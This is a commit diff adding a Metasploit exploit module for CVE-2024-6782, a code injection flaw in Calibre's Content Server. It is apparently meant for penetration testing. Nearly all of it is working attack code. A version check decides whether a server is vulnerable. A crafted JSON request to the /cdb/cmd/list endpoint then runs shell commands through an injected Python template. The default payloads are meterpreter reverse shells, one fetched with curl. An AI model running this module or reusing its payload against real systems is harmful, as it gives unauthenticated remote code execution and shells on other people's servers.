Exploit Module for Calibre Python Code Injection (CVE-2024-6782)

h4x-x0r · h4x-x0r · commit 1fbeb4e22364 · 2024-08-01T23:55:47.000-04:00
diff --git a/modules/exploits/multi/misc/calibre_exec.rb b/modules/exploits/multi/misc/calibre_exec.rb
@@ -0,0 +1,136 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',
+        'Description' => %q{
+          This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Amos Ng', # Discovery & PoC
+          'Michael Heinzl', # MSF exploit
+        ],
+        'References' => [
+          [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],
+          [ 'CVE', '2024-6782']
+        ],
+        'DisclosureDate' => '2024-07-31',
+        'Platform' => ['win', 'linux', 'unix'],
+        'Arch' => [ ARCH_CMD ],
+
+        'Payload' => {
+          'BadChars' => '\\'
+        },
+
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'CURL',
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              },
+              'Type' => :win_fetch
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => [ 'unix', 'linux' ],
+              'Arch' => ARCH_CMD,
+              'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080)
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path)
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    if res && res.code == 200
+      data = res.body.to_s
+      pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/
+
+      version = data.match(pattern)
+
+      if version[1].nil?
+        return CheckCode::Unknown
+      else
+        vprint_status('Version retrieved: ' + version[1].to_s)
+      end
+
+      if Rex::Version.new(version[1]) <= Rex::Version.new('7.14.0') && Rex::Version.new(version[1]) >= Rex::Version.new('6.9.0')
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :win_fetch
+      execute_command(payload.encoded)
+    when :nix_cmd
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd)
+    print_status('Sending payload...')
+    exec_calibre(cmd)
+    print_status('Exploit finished, check thy shell.')
+  end
+
+  def exec_calibre(cmd)
+    payload = "[[\"template\"], \"\", \"\", \"\", 1,\"python:def evaluate(a, b):\\n import subprocess\\n try:\\n  return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n except Exception:\\n  return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\"]"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => payload,
+      'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')
+    })
+
+    if res && res.code == 200
+      print_good('Command successfully executed, check your shell.')
+    end
+  end
+
+end
